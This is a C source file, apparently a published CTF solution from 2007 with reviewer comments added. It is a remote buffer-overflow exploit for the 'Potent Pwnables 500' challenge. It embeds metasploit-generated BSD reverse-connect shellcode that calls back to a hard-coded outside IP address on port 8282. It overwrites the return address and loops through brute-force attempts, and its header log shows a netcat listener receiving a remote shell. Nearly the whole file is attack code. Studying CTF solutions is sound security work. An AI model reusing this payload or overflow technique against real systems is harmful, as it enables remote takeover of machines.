/*
** 0x82-dogfight_pwnage500 - Potent Pwnables 500 remote exploit by x82
**
** exploit:
** --
** [x82@x0x x82]$ ./0x82-dogfight_pwnage500 quals07 12345
**
** Potent Pwnables 500 remote exploit by x82
**
** [+] random port: 32743
** [+] default brute-force count: 20
** [*] exploit end.
**
** [x82@x0x x82]$
** --
**
** result:
** --
** [x82@x0x x82]$ nc -l -p 8282
** whoami
** pwnage500
** exit
** --
**
** (This listing is a CTF solution from the 2007 quals server named above;
**  it is reproduced here as published, with reviewer notes added.)
*/

/* NOTE(review): the six header names were stripped when this listing was
 * extracted (only the bare directives survived). They cannot be recovered
 * from the page, so the file does not compile as shown. */
#include
#include
#include
#include
#include
#include

/* Payload bytes exactly as published. The generator comment below names a
 * metasploit-built reverse-connect payload; 16 NOP (0x90) bytes precede the
 * 92-byte encoded body. Reproduced verbatim; not analysed further here. */
unsigned char scode[] =
/* bsd_ia32_reverse - LHOST=221.154.133.30 LPORT=8282 Size=92 Encoder=PexFnstenvSub http://metasploit.com */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x29\xc9\x83\xe9\xef\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x0b"
"\xe2\x2e\xc3\x83\xeb\xfc\xe2\xf4\x61\x83\x76\x5a\x59\xa0\x7c\x81"
"\x59\x8a\xf3\x59\x8e\xfc\xe3\x43\x63\xf2\x2c\xe3\x51\x6b\xcf\xa9"
"\x1b\xb3\x7e\x92\x9c\x88\x4c\x9b\xc6\x62\x44\xc1\x52\x52\x74\x92"
"\x5c\xb3\xe3\x43\x42\x9b\xd8\x93\x63\xcd\x01\xb0\x63\x8a\x01\xa1"
"\x62\x8c\xa7\x20\x5b\xb6\x7d\x90\xbb\xd9\xe3\x43";

/* Port number reported by the server on the first connection; filled in by
 * first_connect_12345() and read by main(). */
int random_port=0;

/* Scratch buffer shared by every send/recv below. Each user re-zeroes it;
 * nothing here is thread-safe, and the program is single-threaded. */
unsigned char buf[2000];

/*
 * Resolve host, create a TCP socket and connect it to host:port.
 * Returns the connected descriptor, or -1 if resolution, socket() or
 * connect() fails.
 *
 * NOTE(review): when connect() fails the descriptor obtained from socket()
 * is never closed, so every failed attempt leaks an fd. gethostbyname() and
 * h_addr are legacy, non-reentrant interfaces; getaddrinfo() is the modern
 * replacement. bzero() is likewise a legacy spelling of memset(.., 0, ..).
 */
int setsock(char *host,int port){
    struct hostent *se;
    struct sockaddr_in saddr;
    int sock;
    int i;

    se=gethostbyname(host);
    if(se==NULL){
        return -1;
    }
    sock=socket(AF_INET,SOCK_STREAM,0);
    if(sock==-1){
        return -1;
    }
    saddr.sin_family=AF_INET;
    saddr.sin_port=htons(port);
    saddr.sin_addr=*((struct in_addr *)se->h_addr);
    bzero(&(saddr.sin_zero),8);
    i=connect(sock,(struct sockaddr *)&saddr,sizeof(struct sockaddr));
    if(i==-1){
        return -1;  /* sock is leaked on this path */
    }
    return sock;
}

/*
 * Open the first connection to host:port and learn the server's port.
 * buf is zeroed, prefixed with "0x", and the server's reply is received
 * after that prefix; strtoul() with base 0 then interprets the whole thing
 * as hexadecimal because of the "0x". The value lands in random_port and
 * the socket is returned.
 *
 * NOTE(review): setsock()'s -1 is not checked before recv() is called on
 * it. The recv() length is sizeof(buf)-1 (1999) but the destination starts
 * at buf+2, so a full reply writes through buf[2000] -- one byte past the
 * end of the 2000-byte array. In that same case no NUL terminator remains
 * and strtoul() reads past whatever recv() filled; the preceding memset
 * only protects shorter replies.
 */
int first_connect_12345(char *host,int port){
    int sock;

    memset((char *)buf,0,sizeof(buf));
    sock=setsock(host,port);
    buf[0]='0';
    buf[1]='x';
    recv(sock,buf+2,sizeof(buf)-1,0);
    random_port=strtoul(buf,0,0);
    return sock;
}

/*
 * Send the first request: buf is zeroed, filled with 0x500 'x' bytes, cut
 * with a NUL at index 499, and the strlen()-visible prefix (499 bytes) is
 * sent on sock. Returns sock unchanged.
 *
 * The original comment on the buf[499]=0 line was mis-encoded Korean;
 * translated approximately it says "to get it past strlen()".
 *
 * NOTE(review): send()'s return value is ignored, so a short or failed send
 * is not detected.
 */
int first_send(int sock){
    memset((char *)buf,0,sizeof(buf));
    memset((char *)buf,'x',0x500);
    buf[499]=0;  /* author's note (translated): to get it past strlen() */
    send(sock,buf,strlen(buf),0);
    return sock;
}

/*
 * Send the second request: buf is zeroed, 520 bytes of 'x' are written,
 * scode is copied in at offset 4, and three 4-byte words are stored at
 * offsets 520, 524 and 528 through a long* (labelled by the author as the
 * frame pointer, the return address, and a zero word). The resulting 532
 * bytes are sent on sock. Returns sock unchanged.
 *
 * The author's two mis-encoded Korean notes, translated approximately:
 * on the zero word, "eax gets clobbered, so only copy up to the previous
 * part"; and "because of this part, a return-into-libc approach does not
 * work". They are reproduced as the author's reasoning, not verified here.
 *
 * NOTE(review): memcpy() uses strlen(scode), so the copy would stop at the
 * first NUL byte in the payload (the published bytes contain none).
 * Writing through *(long *)&buf[i] assumes long is 4 bytes wide -- true on
 * the ia32 target this was written for, wrong on LP64 hosts where each
 * store is 8 bytes -- and is a strict-aliasing violation; memcpy() of a
 * uint32_t would be the well-defined form. send()'s return is unchecked.
 */
int second_send(int sock){
    int i;

    memset((char *)buf,0,sizeof(buf));
    memset((char *)buf,0,0x500);
    memset((char *)buf,'x',520);
    memcpy(buf+4,scode,strlen(scode));
    i=520;
    *(long *)&buf[i]=0x41414141;  /* frame pointer */
    i+=4;
    *(long *)&buf[i]=0x0804c604;  /* return address */
    i+=4;
    *(long *)&buf[i]=0x0;  /* author's note (translated): eax gets clobbered, so only copy up to the previous part */
    i+=4;
    /* author's note (translated): because of this part, a return-into-libc approach does not work */
    send(sock,buf,i,0);
    return sock;
}

/*
 * Entry point. argv[1] is the host, argv[2] the port of the first service.
 * Opens the first connection to learn random_port, then DEF_COUNT (20)
 * times: opens two further connections to random_port, sends the first
 * payload on one and the second on the other, reads one reply from each
 * (into buf, never printed -- the printf calls are commented out), and
 * closes both. Finally closes the first socket and exits with status -1
 * (255 to the shell) on every path, including success.
 *
 * NOTE(review): atoi() reports no parse errors (strtol would). The results
 * of setsock() and recv() are never checked, so a failed connect leads to
 * send/recv/close on descriptor -1 for that iteration. The (int) casts on
 * the first_send/second_send calls only discard the returned value.
 * DEF_COUNT is #define'd in the middle of the function body; that is legal
 * but unusual -- a file-scope enum would be the conventional form.
 */
int main(int argc,char *argv[]){
    int sock_num0;
    int sock_num1;
    int sock_num2;
    int count=0;

    printf("\nPotent Pwnables 500 remote exploit by x82\n\n");
    if(argc<3){
        printf("Usage: %s [host] [port]\n\n",argv[0]);
        exit(-1);
    }
    sock_num0=(int)first_connect_12345(argv[1],atoi(argv[2]));
    printf(" [+] random port: %d\n",random_port);
#define DEF_COUNT 20
    printf(" [+] default brute-force count: %d\n",DEF_COUNT);
    for(count=0;count<(DEF_COUNT);count++) {
        /* author's note (translated): connect to the first thread */
        sock_num1=(int)setsock(argv[1],random_port);
        /* author's note (translated): connect to the second thread */
        sock_num2=(int)setsock(argv[1],random_port);
        (int)first_send(sock_num1);
        (int)second_send(sock_num2);
        memset((char *)buf,0,sizeof(buf));
        recv(sock_num2,buf,sizeof(buf)-1,0);
        //printf("%s\n",buf);
        close(sock_num2);
        usleep(1000);  /* brief pause between closing the two sockets */
        memset((char *)buf,0,sizeof(buf));
        recv(sock_num1,buf,sizeof(buf)-1,0);
        //printf("%s\n",buf);
        close(sock_num1);
    }
    close(sock_num0);
    printf(" [*] exploit end.\n\n");
    exit(-1);  /* non-zero status even on the success path */
}
/* eoc */